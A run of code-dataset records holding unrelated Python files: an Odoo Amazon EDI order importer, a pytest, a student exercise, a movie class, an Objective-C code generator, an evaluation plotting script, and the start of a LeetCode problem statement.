message_info.get('supplier_id', ''):\n if not self.job_id:\n avc_file_process_job_vals = {\n 'message':'Mismatch Supplier Information',\n 'filename':self.server_filename,\n 'vendor_id':vendor.id,\n 'application':'sale_order',\n 'operation_type':'import',\n 'create_date':datetime.now(),\n 'company_id':vendor.company_id.id or False,\n }\n self.job_id = self.create_avc_file_process_job(avc_file_process_job_vals)\n return True\n \n if not vendor.pricelist_id.currency_id.id == order_info.get('currency_id'):\n if not self.job_id:\n avc_file_process_job_vals = {\n 'message':'Mismatch Pricelist information',\n 'filename':self.server_filename,\n 'vendor_id':vendor.id,\n 'application':'sale_order',\n 'operation_type':'import',\n 'create_date':datetime.now(),\n 'company_id':vendor.company_id.id or False,\n }\n self.job_id = self.create_avc_file_process_job(avc_file_process_job_vals)\n return True\n #checked if order exist or not\n existing_order_id = sale_order_obj.search([('amazon_edi_order_id', '=', order_info.get('order_name', ''))])\n if self.order_type == 'firstorder':\n if existing_order_id:\n return True\n\n #message_id = self.env['amazon.edi.message.info'].create(message_info)\n order_vals = self.prepare_order_vals(vendor,order_info,message_info.get('delivery_party_id',False))\n order_vals.update({'vendor_id':vendor.id,'account_type':self.order_type, 'carrier_id':vendor.amazon_edi_carrier_method.id or False})\n order_vals.update(message_info)\n if vendor.warehouse_id : \n order_vals.update({'warehouse_id':vendor.warehouse_id.id})\n order_id = sale_order_obj.create(order_vals)\n #message_id.write({'order_id':order_id.id})\n #self.order_id = order_id \n fiscal_position_id = order_vals.get('fiscal_position_id',False)\n fiscal_position = self.env['account.fiscal.position'].browse(fiscal_position_id) or False \n line_id = False\n \n #CREATE LOG IN avc.file.transaction.log\n avc_file_process_job_vals = {\n 'message': 'Order imported',\n 'filename': self.server_filename,\n 'vendor_id': vendor.id,\n 'application' : 'sale_order',\n 'operation_type' : 'import',\n 'create_date' : datetime.now(),\n 'company_id':vendor.company_id.id or False,\n 'sale_order_id':order_id.id,\n }\n self.job_id = self.create_avc_file_process_job(avc_file_process_job_vals)\n \n for key,value in order_line_info.items():\n default_code = value.get('default_code',False)\n ean = value.get('ean',False)\n product = False\n if default_code:\n product = product_product_obj.search([('amazon_sku','=',default_code)])\n if not product :\n product = product_product_obj.search([('default_code','=',default_code)]) \n code_type=\"SKU\"\n amazon_code = default_code\n amazon_edi_line_code_type = 'sku'\n if ean :\n product = product_product_obj.search([('barcode','=',ean)])\n code_type = \"barcode\"\n amazon_code = ean\n amazon_edi_line_code_type = 'barcode'\n orderlinevals ={}\n line = ()\n if product:\n qty = value.get('qty',0.0)\n price = value.get('price',0.0) \n line=(product,price,amazon_code,qty)\n \n orderlinevals,product_id, qty_code = self.prepare_order_line_vals(line,order_id)\n orderlinevals.update({'amazon_edi_line_code_type' : amazon_edi_line_code_type})\n if orderlinevals:\n sale_order_line_id = sale_order_line_obj.create(orderlinevals)\n \n avc_transaction_log_val = {\n 'message':'Sale Order Line Created',\n 'remark':'sale order id %s'%(order_id.name or ''),\n 'sale_order_id':order_id.id,\n 'job_id':self.job_id.id,\n 'picking_id':False,\n 'back_order_id':False,\n 'sale_order_line_id':sale_order_line_id.id,\n 'product_id':orderlinevals.get('product_id',''),\n 'package_id':False,\n 'stock_inventory_id':False,\n 'company_id':self.job_id.company_id.id or False,\n 'user_id':self.env.user.id,\n 'picking_state':'draft',\n 'application':'sale_order',\n 'export_qty':orderlinevals.get('product_uom_qty',''),\n 'processed_qty':orderlinevals.get('product_uom_qty',''),\n 'manually_processed':False,\n 'is_mismatch_detail':False,\n 'skip_line':False,\n 'skip_order':False,\n 'filename':self.server_filename,\n 'create_date':datetime.now(),\n 'operation_type':'import',\n 'price':price,\n }\n self.job_id.transaction_log_ids.create(avc_transaction_log_val)\n else:\n line = line + (False,qty_code)\n self.ack_error_lines.append(line)\n self.create_avc_transaction_lines(order_id,code_type='SKU',code=code,processed_qty=qty,msg='Product not found',price=price)\n else:\n qty_code = 182\n line = line + (False,qty_code)\n self.ack_error_lines.append(line)\n self.create_avc_transaction_lines(order_id,code_type='barcode',code=amazon_code,processed_qty=qty,msg='Product not found',price=price)\n return True\n\n @api.multi\n def prepare_order_vals(self,vendor,order_info,delivery_party_id):\n \"\"\"\n Use: To generate sale order's value based on given information.\n :param order_info: Sale Order required information\n :param delivery_party_id: Delivery Party ID\n :return: sale order values (dict{})\n \"\"\"\n sale_order_obj = self.env['sale.order']\n partner_obj = self.env['res.partner']\n address_data = order_info.get('inv_address_data',{})\n delivery_address = order_info.get('delivery_address',{})\n partner_id=address_data.get('parent_id',False)\n if not partner_id:\n return\n \n inv_add_domain=[]\n for address in address_data:\n inv_add_domain.append((address,'=',address_data.get(address)))\n\n inv_add_id = partner_obj.search(inv_add_domain)\n inv_add_id = inv_add_id and inv_add_id[0] \n if not inv_add_id:\n inv_add_id = partner_obj.create(address_data)\n \n delivert_add_domain=[]\n for address in delivery_address:\n delivert_add_domain.append((address,'=',delivery_address.get(address)))\n \n delivery_add_id = partner_obj.search(delivert_add_domain)\n delivery_add_id = delivery_add_id and delivery_add_id[0]\n if not delivery_add_id:\n delivery_add_id = partner_obj.create(delivery_address)\n \n delivery_id = partner_obj.search([('edi_gln_no','=',delivery_party_id),('parent_id','=',partner_id)])\n if not delivery_id:\n delivery_id = partner_obj.search([('edi_gln_no','=',delivery_party_id)])\n if delivery_id and delivery_id.id != partner_id:\n delivery_id.write({'parent_id':partner_id})\n else:\n partner_obj.browse(partner_id).write({'edi_gln_no': delivery_party_id})\n\n partner_address = partner_obj.browse(partner_id).address_get(['contact','invoice','delivery'])\n \n ordervals={\n 'company_id':vendor.company_id.id or False,\n 'partner_id' :partner_address.get('contact',False),\n }\n new_record = sale_order_obj.new(ordervals)\n new_record.onchange_partner_id()\n ordervals = sale_order_obj._convert_to_write({name: new_record[name] for name in new_record._cache})\n new_record = sale_order_obj.new(ordervals)\n new_record.onchange_partner_shipping_id()\n ordervals = sale_order_obj._convert_to_write({name: new_record[name] for name in new_record._cache})\n ordervals.update({\n 'name' : order_info.get('order_name'),\n 'amazon_edi_order_id' : order_info.get('order_name',''),\n 'picking_policy' : vendor.picking_policy or False,\n 'date_order' : order_info.get('date_order',False) and order_info['date_order'].strftime('%Y-%m-%d') or time.strftime('%Y-%m-%d'),\n 'state' : 'draft',\n #'invoice_status' : self.instance_id.amazon_edi_invoice_status or 'invoiced',\n 'mismatch_product' : vendor.mismatch_product,\n 'is_amazon_edi_order' : True,\n 'note': order_info.get('order_name',''),\n 'client_order_ref' : order_info.get('order_name',''),\n 'pricelist_id': order_info.get('pricelist_id',False),\n })\n return ordervals\n \n# @api.multi\n# def _get_product_stock_for_ack(self,vendor,location_id,company_id):\n# ## Query for get stock based on configuration\n# # location_id = vendor.warehouse_id and vendor.warehouse_id.location_id and vendor.warehouse_id.location_id.id\n# # company_id = vendor.company_id and vendor.company_id.id\n# qry = \"\"\n# stock_dict = {}\n# if vendor.picking_policy_based_on == 'qty_on_hand' :\n# qry = \"\"\"\n# select product_id,sum(quantity)-sum(reserved_quantity) as total_qty from stock_quant \n# where location_id in (%s) and company_id=(%s)\n# group by product_id\n# \"\"\"%(location_id,company_id)\n# if vendor.picking_policy_based_on == 'forecast_sale' :\n# qry = \"\"\"\n# select product_id,sum(total_qty)\n# from\n# (\n# select product_id,sum(quantity)-sum(reserved_quantity) as total_qty from stock_quant \n# where location_id in (%s) and company_id=%s\n# group by product_id\n# union all \n# select product_id,sum(product_qty) as total_qty from stock_move\n# where location_dest_id in (%s) and company_id=%s and state not in ('draft','done','cancel')\n# group by product_id\n# union all \n# select product_id,-sum(product_qty) as total_qty from stock_move\n# where location_id in (%s) and company_id=%s and state in ('waiting','confirmed')\n# group by product_id \n# )T\n# group by product_id\n# \n# \"\"\"%(location_id,company_id,location_id,company_id,location_id,company_id)\n# self._cr.execute(qry)\n# results = self._cr.fetchall()\n# for result_tuple in results:\n# stock_dict.update({result_tuple[0] : result_tuple[1]})\n# return stock_dict\n @api.multi\n def prepare_order_line_vals(self,line_info,order_id):\n \"\"\"\n Use: create sale order line values\n :param line_info: sale order line dict\n :param order_id: sale order id\n :param fiscal_position: fiscal position\n :return: sale_order_line dict{}, product_id, qty_code\n \"\"\"\n product_id = line_info[0]\n file_price = line_info[1]\n amazon_edi_code = line_info[2]\n qty = float(line_info[3])\n product_product = self.env['product.product']\n sale_order_line_obj = self.env['sale.order.line']\n qty_code = False\n \n #product_id = product_product.search([('default_code','=',default_code)])\n if not product_id:\n qty_code = 182\n return () , product_id, qty_code\n orderlinevals = {\n 'order_id' : order_id.id,\n 'product_id' : product_id.id,\n } \n new_record = sale_order_line_obj.new(orderlinevals)\n new_record.product_id_change()\n orderlinevals=new_record._convert_to_write({name: new_record[name] for name in new_record._cache}) \n orderlinevals.update({\n 'product_uom_qty' : qty,\n 'price_unit' : float(file_price),\n 'customer_lead' : product_id and product_id.product_tmpl_id.sale_delay,\n 'invoice_status' : 'invoiced',\n 'amazon_edi_line_code': amazon_edi_code,\n })\n qty_code = 12\n return orderlinevals, product_id, qty_code\n\n @api.multi\n def prepare_line(self, fiscal_position=None, product_id=None, order_id=None, qty=None, file_price=None, amazon_edi_code=None):\n \"\"\"\n Use: Prepare sale order line data with backorder value\n :param fiscal_position: Fiscal Position\n :param product_id: Product ID\n :param order_id: Sale Order ID\n :param qty: Ordered Quantity\n :param file_price: Received price in PO file\n :param amazon_edi_code: Barcode / received from PO file\n :return: sale order line dict{}, product_id, qty_code\n \"\"\"\n sale_order_line_obj = self.env['sale.order.line']\n tax_id = False\n if fiscal_position:\n tax_id = fiscal_position.map_tax(product_id.taxes_id).ids\n\n orderlinevals = {\n 'order_id':order_id.id,\n 'product_id':product_id.id,\n }\n new_record = sale_order_line_obj.new(orderlinevals)\n new_record.product_id_change()\n orderlinevals = new_record._convert_to_write({name:new_record[name] for name in new_record._cache})\n if not orderlinevals.get('tax_id', []):\n tax_id = [(6, 0, tax_id)]\n orderlinevals.update({'tax_id':tax_id})\n orderlinevals.update({\n 'product_uom_qty':qty,\n 'price_unit':float(file_price),\n 'customer_lead':product_id and product_id.product_tmpl_id.sale_delay,\n 'invoice_status':'invoiced',\n 'amazon_edi_line_code':amazon_edi_code,\n })\n return orderlinevals, product_id\n\n @api.multi\n def create_avc_file_process_job(self,vals):\n \"\"\"\n Use: To create new record in avc.file.transaction.log model.\n :param vals: Required Value for avc.file.transaction.log\n :return: avc.file.transaction.log new record ID\n \"\"\"\n avc_file_process_job_obj=self.env['avc.file.transaction.log']\n job_id = avc_file_process_job_obj.create(vals)\n return job_id\n \n @api.multi\n def create_avc_transaction_lines(self,order,code_type=None,code=None,processed_qty=None,msg=None,price=None,product_id=None):\n \"\"\"\n Use: To create avc.transaction.log.line new line.\n :param code_type: code information sku/barcode\n :param code: code data\n :param processed_qty: ordered quantity\n :param msg: message for log line\n :param price: price ordered product\n :param product_id: product id if available\n :return: avc.transaction.log.line's id\n \"\"\"\n #it make an entry in avc.transaction.log.line\n avc_transaction_log_val = {\n 'message':msg if msg else 'Product not Found',\n 'remark': '%s:%s'%(code_type,code),\n 'sale_order_id':order.id,\n 'job_id':self.job_id.id,\n 'company_id':self.job_id.company_id.id or False,\n 'user_id':self.env.user.id,\n 'application':'sale_order',\n 'export_qty':0.0,\n 'processed_qty':processed_qty,\n 'manually_processed':False,\n 'is_mismatch_detail':False if product_id else True,\n 'skip_line':True,\n 'skip_order':False,\n 'filename':self.server_filename,\n 'create_date':datetime.now(),\n 'operation_type':'import',\n 'price':price,\n 'product_id':product_id if product_id else False,\n }\n res = self.job_id.transaction_log_ids.create(avc_transaction_log_val)\n return res\n \n \n \n \n @api.multi\n def to_pdf417(self,order_id, packages):\n \"\"\"\n Use: This method called from \"report_edi_saleorder_barcode_label\" QWeb report.\n This method used for creaate PDF417 format barcode which used in GS1-128 Label.\n :param order_id: sale order id\n :param packages: packages dictionary\n :return: barcode label base64 image data\n \"\"\"\n sale_order_id = self.browse(order_id)\n text = \"AMZN\"\n text = text + ',PO: ' + sale_order_id.amazon_edi_order_id\n for package in packages:\n if package.get('barcode'):\n text = text + ',UPC: ' + str(package.get('barcode')) + ','\n else:\n text = text + ',EAN: ' + str(package.get('default_code')) + ','\n text = text + 'QTY: ' + str(package.get('product_qty'))\n\n print (text)\n\n codes = encode(text, columns=5)\n image = render_image(codes)\n buffer = StringIO()\n image.save(buffer, format=\"JPEG\")\n img_str = base64.b64encode(buffer.getvalue())\n\n return img_str\n \n @api.multi\n def get_total_qty(self):\n \"\"\"\n Use: This method called from \"report_edi_saleorder_barcode_label\" QWeb report.\n :return: total quantity of selected sale order.\n \"\"\"\n qty = 0\n for line in self.order_line:\n qty += line.product_uom_qty\n return qty\n\n @api.multi\n def get_package_information(self,order_id=None):\n \"\"\"\n Use: To get pericular sale order's Package information.\n :param order_id: sale order id\n :return: dictionary with package information.\n \"\"\"\n res = {}\n sale_order_id = self.browse(order_id)\n for ids in sale_order_id.picking_ids.pack_operation_product_ids:\n line_info = {'product_id':ids.product_id.id, 'product_qty':ids.product_qty, 'default_code':ids.product_id.default_code or '', 'barcode':ids.product_id.barcode or ''}\n if res.get(ids.result_package_id.name):\n data = res.get(ids.result_package_id.name)\n data.append(line_info)\n res.update({ids.result_package_id.name:data})\n else:\n res.update({ids.result_package_id.name:[line_info]})\n return res\n\n \n\n @api.multi\n def _prepare_invoice(self):\n \"\"\"\n USE: this method call super _prepare_invoice of sale.order after that it checks\n whether current sale order is amazon vendor central's order if yes then it will\n update journal_id which set in amazon vendor instance.\n :return: invoice_value dict\n \"\"\"\n res = super(sale_order, self)._prepare_invoice()\n if self.is_amazon_edi_order and self.vendor_id.journal_id:\n res.update({'journal_id':self.vendor_id.journal_id.id})\n return res","sub_path":"odoo_apps/amazon_vendor_central_ept/model/amazon_sale_order.py","file_name":"amazon_sale_order.py","file_ext":"py","file_size_in_byte":45906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"507685847","text":"import pytest\nimport src.misc as misc\n\n\n@pytest.mark.parametrize(\"answer, expected_answer\",\n [('', True),\n (' ', True),\n ('yes', True),\n ('Yes', True),\n ('YES', True),\n ('Y', True),\n ('no', False),\n ('No', False),\n ('NO', False),\n ('N', False)])\ndef test_confirm(monkeypatch, answer, expected_answer):\n monkeypatch.setattr('builtins.input', lambda x: answer)\n assert misc.confirm() == expected_answer","sub_path":"tests/misc_test.py","file_name":"misc_test.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"276573562","text":"def main():\n # escribe tu código abajo de esta línea\n msj=int(input(\"Dame el número de mensajes: \"))\n m=float(input(\"Dame el número de megas: \"))\n minutos=int(input(\"Dame el numero de minutos¨: \"))\n\n mensajes=0.80*msj\n megas=0.80*m\n min=0.80*minutos\n\n costomensual= mensajes+megas+min\n print(\"El costo mensual es:\",costomensual)\n\nif __name__ == '__main__':\n main()\n","sub_path":"assignments/09Telefono/src/exercise.py","file_name":"exercise.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"109095026","text":"import webbrowser\r\n\r\n\r\nclass Movie():\r\n\r\n # centents are defined here\r\n def __init__(\r\n self,\r\n movie_title,\r\n movive_storyline,\r\n poster_image,\r\n trailer_youtube\r\n ):\r\n self.title = movie_title\r\n self.storyline = movive_storyline\r\n self.poster_image_url = poster_image\r\n self.trailer_youtube_url = trailer_youtube\r\n\r\n # open webbrowser when check the poster\r\n def show_trailer(self):\r\n webbrowser.open(self.trailer_youtube_url)\r\n","sub_path":"media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"12549095","text":"# encoding: utf-8\nfrom pdefc.lang import TypeEnum\nfrom pdefc.generators import Generator, Templates, GeneratorCli, PrefixMapper\n\n\nENCODING = 'utf8'\nHEADER_TEMPLATE = 'header.jinja2'\nIMPL_TEMPLATE = 'impl.jinja2'\nPACKAGE_TEMPLATE = 'package.jinja2'\n\n\nclass ObjectiveCGeneratorCli(GeneratorCli):\n def build_parser(self, parser):\n self._add_prefix_args(parser)\n\n def create_generator(self, out, args):\n prefixes = self._parse_prefix_args(args)\n return ObjectiveCGenerator(out, prefixes)\n\n\nclass ObjectiveCGenerator(Generator):\n '''Objective-C code generator.'''\n\n @classmethod\n def create_cli(cls):\n return ObjectiveCGeneratorCli()\n\n def __init__(self, out, prefixes=None):\n '''Create a new generator.'''\n super(ObjectiveCGenerator, self).__init__(out)\n\n self.prefix_mapper = PrefixMapper(prefixes)\n self.filters = _ObjectiveCFilters(self.prefix_mapper)\n self.templates = Templates(__file__, filters=self.filters)\n\n def generate(self, package):\n '''Generate a package source code.'''\n for module in package.modules:\n for definition in module.definitions:\n self._generate_header(definition)\n self._generate_impl(definition)\n\n self._generate_package(package)\n\n def _generate_header(self, definition):\n '''Generate a definition header file.'''\n code = self.templates.render(HEADER_TEMPLATE, definition=definition)\n filename = '%s.h' % self.filters.objc_name(definition)\n self.write_file(filename, code)\n return code\n\n def _generate_impl(self, definition):\n '''Generate a definition implementation file.'''\n code = self.templates.render(IMPL_TEMPLATE, definition=definition)\n filename = '%s.m' % self.filters.objc_name(definition)\n self.write_file(filename, code)\n return code\n\n def _generate_package(self, package):\n '''Generate a package file which groups all headers.'''\n code = self.templates.render(PACKAGE_TEMPLATE, package=package)\n\n names = set()\n for module in package.modules:\n for definition in module.definitions:\n names.add(self.filters.objc_name(definition).lower())\n\n # Generate a unique package file name.\n name = package.name\n while name in names:\n name += '_package'\n\n # Convert it into a CamelCase string.\n name = name.title().replace('_', '')\n\n # Write the package header file.\n filename = '%s.h' % name\n self.write_file(filename, code)\n return code\n\n\nclass _ObjectiveCFilters(object):\n '''Objective-C jinja filters.'''\n def __init__(self, prefix_mapper):\n self.prefix_mapper = prefix_mapper\n\n def objc_name(self, def0):\n name = def0.name\n prefix = self.prefix_mapper.get_prefix(def0.namespace) or ''\n return prefix + name\n\n def objc_bool(self, expression):\n return 'YES' if expression else 'NO'\n\n def objc_base(self, message):\n return self.objc_name(message.base) if message.base else 'PDMessage'\n\n def objc_isprimitive(self, type0):\n pointers = TypeEnum.COLLECTION_TYPES \\\n + (TypeEnum.MESSAGE, TypeEnum.INTERFACE, TypeEnum.STRING, TypeEnum.DATETIME)\n return type0.type not in pointers\n\n def objc_type(self, type0):\n t = type0.type\n if t in NATIVE_TYPES:\n return NATIVE_TYPES[t]\n elif t == TypeEnum.ENUM_VALUE:\n return '%s_%s ' % (self.objc_name(type0.enum), type0.name)\n elif t == TypeEnum.ENUM:\n return '%s ' % self.objc_name(type0)\n elif t == TypeEnum.INTERFACE:\n return 'id<%s> ' % self.objc_name(type0)\n elif t == TypeEnum.MESSAGE:\n return '%s *' % self.objc_name(type0)\n raise ValueError('Unsupported type %r' % type0)\n\n def objc_descriptor(self, type0):\n t = type0.type\n if t in NATIVE_DESCRIPTORS:\n return NATIVE_DESCRIPTORS[t]\n elif t == TypeEnum.ENUM:\n return '%sDescriptor()' % self.objc_name(type0)\n elif t == TypeEnum.LIST:\n return '[PDDescriptors listWithElement:%s]' % self.objc_descriptor(type0.element)\n elif t == TypeEnum.SET:\n return '[PDDescriptors setWithElement:%s]' % self.objc_descriptor(type0.element)\n elif t == TypeEnum.MAP:\n return '[PDDescriptors mapWithKey:%s value:%s]' % (\n self.objc_descriptor(type0.key),\n self.objc_descriptor(type0.value))\n elif t == TypeEnum.INTERFACE:\n return '%sDescriptor()' % self.objc_name(type0)\n elif t == TypeEnum.MESSAGE:\n return '[%s typeDescriptor]' % self.objc_name(type0)\n raise ValueError('Unsupported type %r' % type0)\n\n def objc_default(self, type0):\n t = type0.type\n value = NATIVE_DEFAULTS.get(t)\n if value:\n return value\n\n if t == TypeEnum.ENUM:\n return '0'\n\n return 'nil'\n\n def objc_result(self, type0):\n if type0.is_interface:\n return 'id<%s> ' % self.objc_name(type0)\n return 'NSOperation *'\n\n\nNATIVE_TYPES = {\n TypeEnum.BOOL: 'BOOL ',\n TypeEnum.INT16: 'int16_t ',\n TypeEnum.INT32: 'int32_t ',\n TypeEnum.INT64: 'int64_t ',\n TypeEnum.FLOAT: 'float ',\n TypeEnum.DOUBLE: 'double ',\n\n TypeEnum.STRING: 'NSString *',\n TypeEnum.DATETIME: 'NSDate *',\n\n TypeEnum.VOID: 'id',\n\n TypeEnum.LIST: 'NSArray *',\n TypeEnum.SET: 'NSSet *',\n TypeEnum.MAP: 'NSDictionary *'\n}\n\nNATIVE_DESCRIPTORS = {\n TypeEnum.BOOL: '[PDDescriptors bool0]',\n TypeEnum.INT16: '[PDDescriptors int16]',\n TypeEnum.INT32: '[PDDescriptors int32]',\n TypeEnum.INT64: '[PDDescriptors int64]',\n TypeEnum.FLOAT: '[PDDescriptors float0]',\n TypeEnum.DOUBLE: '[PDDescriptors double0]',\n\n TypeEnum.STRING: '[PDDescriptors string]',\n TypeEnum.DATETIME: '[PDDescriptors datetime]',\n\n TypeEnum.VOID: '[PDDescriptors void0]',\n}\n\nNATIVE_DEFAULTS = {\n TypeEnum.BOOL: 'NO',\n TypeEnum.INT16: '0',\n TypeEnum.INT32: '0',\n TypeEnum.INT64: '0L',\n TypeEnum.FLOAT: '0.0f',\n TypeEnum.DOUBLE: '0.0'\n}\n","sub_path":"generator/pdef_objc/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"388614422","text":"import json\nimport os\nimport pickle\nimport random\nfrom collections import defaultdict\n\nimport h5py\nimport sys\nimport numpy as np\nfrom os.path import join\n\nimport re\n\nfrom pandas import DataFrame\nfrom progressbar import ProgressBar\n\nfrom utils import array2txt, DBI\n\n# os.chdir('data_0626')\n\nfilename = 'features_x_new.hdf5'\n\nfeatures = json.load(open(join('../setup', 'feature_list.json')))\nfeature_names = sorted([f['id'] for f in features])\n\nrandom_array = np.array([6.00000000e-05, 2.20000000e-04, 6.80000000e-04, 1.90750000e-03,\n 4.72750000e-03, 1.13875000e-02, 2.59575000e-02, 5.65350000e-02,\n 1.15300000e-01, 2.16387500e-01])\n\nprecision = [random_array]\nnames = ['random']\n\n# Random Result:\n# [ 6.00000000e-05 2.20000000e-04 6.80000000e-04 1.90750000e-03\n# 4.72750000e-03 1.13875000e-02 2.59575000e-02 5.65350000e-02\n# 1.15300000e-01 2.16387500e-01]\n\ndoc2cate = {str(doc['index']): doc['category']\n for doc in DBI().articles.find({'target': True},\n {'category': 1, 'index': 1})}\n\nprint(len(doc2cate))\ncates = set(doc2cate.values())\nprint(len(cates))\n\ncate_precision = defaultdict(list)\n\ntry:\n precision = pickle.load(open('evaluate_precision.p', 'rb'))\n\n cate_precision = pickle.load(open('evaluate_precision_cate.p', 'rb'))\nexcept:\n measure_results = h5py.File(filename, 'r')\n label = h5py.File('features_y.hdf5')\n for i, feature_name in enumerate(feature_names):\n print(i, feature_name)\n hit = np.zeros((10,))\n total = np.zeros((10,))\n cate_hit = {c: np.zeros((10,)) for c in cates}\n cate_total = {c: np.zeros((10,)) for c in cates}\n keys = list(measure_results.keys())\n pbar = ProgressBar(max_value=len(keys))\n for key in keys:\n measure = measure_results[key][:, i]\n top_ids = np.argsort(measure)[-2:]\n cate = doc2cate[key]\n for _id in top_ids:\n total += np.array([1] * 10)\n cate_total[cate] += np.array([1] * 10)\n hit += label[key][_id]\n cate_hit[cate] += label[key][_id]\n pbar.update(pbar.value + 1)\n pbar.finish()\n precision.append(hit / total)\n for c in cates:\n cate_precision[c].append(cate_hit[c] / cate_total[c])\n print(precision[-1])\n\n pickle.dump(precision, open('evaluate_precision.p', 'wb'))\n pickle.dump(cate_precision, open('evaluate_precision_cate.p', 'wb'))\n\nprecision = np.array(precision)\nfor c in cate_precision:\n cate_precision[c].insert(0, random_array)\n cate_precision[c] = np.array(cate_precision[c])\n\ntext = ['content', 'title', 'summary']\n\n\ndef get_indexes(feature_names):\n regex = '(.+)_(.+)_(.+)_(.+)'\n pattern = re.compile(regex)\n result_indexes = [[[] for _i in range(0, 3)] for _ in range(0, 3)]\n result_headers = [[[] for _i in range(0, 3)] for _ in range(0, 3)]\n for i, name in enumerate(feature_names):\n find = pattern.findall(name)\n if len(find) > 0 and ((find[0][1] == '1' and find[0][0] == 'stem')\n or (find[0][1] != '1' and find[0][0] == 'stemo')):\n find = find[0]\n result_indexes[text.index(find[2])][int(find[1]) - 1].append(i + 1)\n result_headers[text.index(find[2])][int(find[1]) - 1].append(find[3])\n return result_indexes, result_headers\n\nfeatures_indexes, feature_headers = get_indexes(feature_names)\n\n\nfrom matplotlib.backends.backend_pdf import PdfPages\nfrom matplotlib import pyplot as plt\nimport seaborn as sns\nimport matplotlib.ticker as mticker\npp = PdfPages('precision_2_3.pdf')\nsns.set('paper', style=\"dark\", color_codes=True)\nf, subfigs = plt.subplots(3, 3)\nplt.subplots_adjust(hspace=0.1, wspace=0.1)\nmodel_names = ['bow', 'jaccard', 'lda', 'lsi', 'tfidf']\ntarget_index = [1, 0, 4, 3, 2]\nfor i in range(0, 3):\n for j in range(0, 3):\n ax = subfigs[j][i]\n print(text[i], j + 1)\n index = features_indexes[i][j]\n headers = feature_headers[i][j]\n precision_feature = precision[index][:, 2]\n if j != 0:\n precision_feature[2] = 0\n frame = DataFrame([[model_names[index], precision_feature[index] * 100] for index in target_index\n if precision_feature[index] > 0],\n columns=['model', 'precision'])\n sns.barplot(x='precision', y='model', data=frame, ax=ax)\n max_width = max(precision_feature) * 100\n for p in ax.patches:\n if p.get_width() == max_width:\n ax.annotate('{:.2f}'.format(p.get_width()), (p.get_width() + 1, p.get_y() + 0.5), weight='bold',\n color='r', size=8)\n else:\n ax.annotate('{:.2f}'.format(p.get_width()), (p.get_width() + 1, p.get_y() + 0.5), size=8)\n\n ax.set(xlim=(0, 50))\n ax.set_ylabel('')\n ax.set_xlabel('')\n if j == 0:\n ax.set_title(text[i])\n if i == 2:\n ax.text(52, 2 if j == 0 else 1.5, ['unigram', 'bigram', 'trigram'][j], va='center', rotation='vertical')\n if i == 1:\n ax.yaxis.set_major_locator(mticker.NullLocator())\n if i == 2:\n ax.yaxis.set_major_locator(mticker.NullLocator())\n if j < 2:\n ax.xaxis.set_major_locator(mticker.NullLocator())\n\nf.text(0.5, 0.02, 'precision (%)', ha='center')\nf.text(0.02, 0.5, 'STS model', va='center', rotation='vertical')\npp.savefig()\npp.close()\n# plt.show()\n\n'''\nf_tex = open('../report_tex.txt', 'w')\nf_simple = open('../report_simple.txt', 'w')\nfor i in range(0, 3):\n for j in range(0, 3):\n print(text[i], j + 1)\n index = features_indexes[i][j]\n headers = feature_headers[i][j]\n precision_feature = precision[index]\n\n sort = np.argsort(precision_feature[:, 2])[::-1]\n sort_headers = [headers[sort_i] for sort_i in sort]\n sort_precision = np.array([precision_feature[sort_i] for sort_i in sort])\n latex = array2txt(sort_precision, [['{}-hops'.format(i) for i in range(1, 11)], sort_headers],\n variant_axis=[0, 1], format='latex')\n f_tex.write(text[i] + '_' + str(j + 1) + '\\n')\n f_tex.write(latex + '\\n\\n\\n')\n simple = array2txt(sort_precision, [['{}-hops'.format(i) for i in range(1, 11)], sort_headers],\n variant_axis=[0, 1], format='simple')\n f_simple.write(text[i] + '_' + str(j + 1) + '\\n')\n f_simple.write(simple + '\\n\\n\\n')\n print(array2txt(sort_precision, [['{}-hops'.format(i) for i in range(1, 11)], sort_headers],\n variant_axis=[0, 1], format='grid'))\n\n best = []\n\n for c in cates:\n cate_precision_feature = cate_precision[c][index]\n cate_sort = np.argsort(cate_precision_feature[:, 2])[::-1]\n cate_sort_headers = [headers[sort_i] for sort_i in cate_sort]\n cate_sort_precision = np.array([cate_precision_feature[sort_i] for sort_i in cate_sort])\n f_tex.write(c + '\\n')\n f_tex.write(array2txt(cate_sort_precision, [['{}-hops'.format(i) for i in range(1, 11)],\n cate_sort_headers],\n variant_axis=[0, 1], format='latex') + '\\n\\n\\n')\n f_simple.write(c + '\\n')\n f_simple.write(array2txt(cate_sort_precision, [['{}-hops'.format(i) for i in range(1, 11)],\n cate_sort_headers],\n variant_axis=[0, 1], format='simple') + '\\n\\n\\n')\n\n best.append(cate_sort_precision[0].tolist() + [cate_sort_headers[0]])\n best = np.array(best)\n cate_list = list(cates)\n best_sort = np.argsort(best[:, 2])[::-1]\n best_sort_headers = [cate_list[sort_i] for sort_i in best_sort]\n best_sort_precision = np.array([best[sort_i] for sort_i in best_sort])\n print(array2txt(best_sort_precision, [['{}-hops'.format(i) for i in range(1, 11)] + ['feature name'],\n best_sort_headers],\n variant_axis=[0, 1], format='grid'))\n\n'''\n","sub_path":"source/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":8252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"335485270","text":"\"\"\"\n1162. As Far from Land as Possible\n\nGiven an n x n grid containing only values 0 and 1, where 0 represents water and 1 represents land, find a water cell\nsuch that its distance to the nearest land cell is maximized, and return the distance. If no land or water exists in the grid, return -1.\n\nThe distance used in this problem is the Manhattan distance: the distance between two cells (x0, y0) and (x1, y1) is |x0 - x1| + |y0 - y1|.\n\n\nExample 1:\n\n\nInput: grid = [[1,0,1],[0,0,0],[1,0,1]]\nOutput: 2\nExplanation: The cell (1, 1) is as far as possible from all the land with distance 2.\nExample 2:\n\n\nInput: grid = [[1,0,0],[0,0,0],[0,0,0]]\nOutput: 4\nExplanation: The cell (2, 2) is as far as possible from all the land with distance 